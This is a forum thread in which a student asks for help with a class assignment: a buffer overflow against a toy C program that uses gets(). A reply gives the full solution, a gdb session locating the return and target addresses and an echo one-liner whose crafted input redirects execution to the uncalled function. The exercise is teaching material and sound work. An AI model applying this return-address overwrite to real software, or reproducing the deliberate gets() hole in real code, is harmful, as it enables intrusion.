C++

Forum

 
Help Buffer Overflow Attack

xjoshpointoh (3)
Hey, for an assignment in my class I am supposed to write a C program that Implements a buffer overflow attack on the program below, isThisGood.c, by exploiting the input, see gets(). You do NOT modify the program below, instead craft a malicious input that causes a successful exploit. (It is OK to add comments @ the top of the program.) Successful exploit invokes the function, oopsIGotToTheBadFunction, though this function is NOT explicitly called in the code!

Could anyone please help me with this?

#include <stdio.h>
#include <stdlib.h>

int oopsIGotToTheBadFunction(void)
{
printf("Gotcha!\n");
exit(0);
}

int goodFunctionUserInput(void)
{
char buf[12];
gets(buf);
return(1);
}

int main(void)
{
goodFunctionUserInput();
printf("Overflow failed\n");
return(1);
}


Overflow failed
Last edited on
ne555 (10692)
http://www.cplusplus.com/forum/beginner/148111/

--- spoilers ahead ---
$ clang++ -ggdb foo.cpp
$ gdb a.out
(gdb) break goodFunctionUserInput
Breakpoint 1 at 0x4005cc: file foo.cpp, line 11.
(gdb) run
Starting program: ./a.out 

Breakpoint 1, goodFunctionUserInput () at foo.cpp:11
(gdb) backtrace
#0  goodFunctionUserInput () at foo.cpp:11
#1  0x0000000000400604 in main () at foo.cpp:16
(gdb) print /x *buf@40
$1 = {0xa0, 0x4, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0xd0, 0xe0, 0xff, 0xff, 0xff, 0x7f, 0x0, 
  0x0, 0x4, 0x6, 0x40, 0x0, 0x0, 0x0, 0x0, 0x0, 0xb0, 0xe1, 0xff, 0xff, 0xff, 0x7f, 0x0, 0x0, 0x0, 0x0, 0x0, 
  0x0}
(gdb) print oopsIGotToTheBadFunction
{int (void)} 0x400590 <oopsIGotToTheBadFunction()>
(gdb) quit
$ echo -e "farmacodependientes\x0\x90\x05\x40" | ./a.out
Gotcha!
Last edited on
Topic archived. No new replies allowed.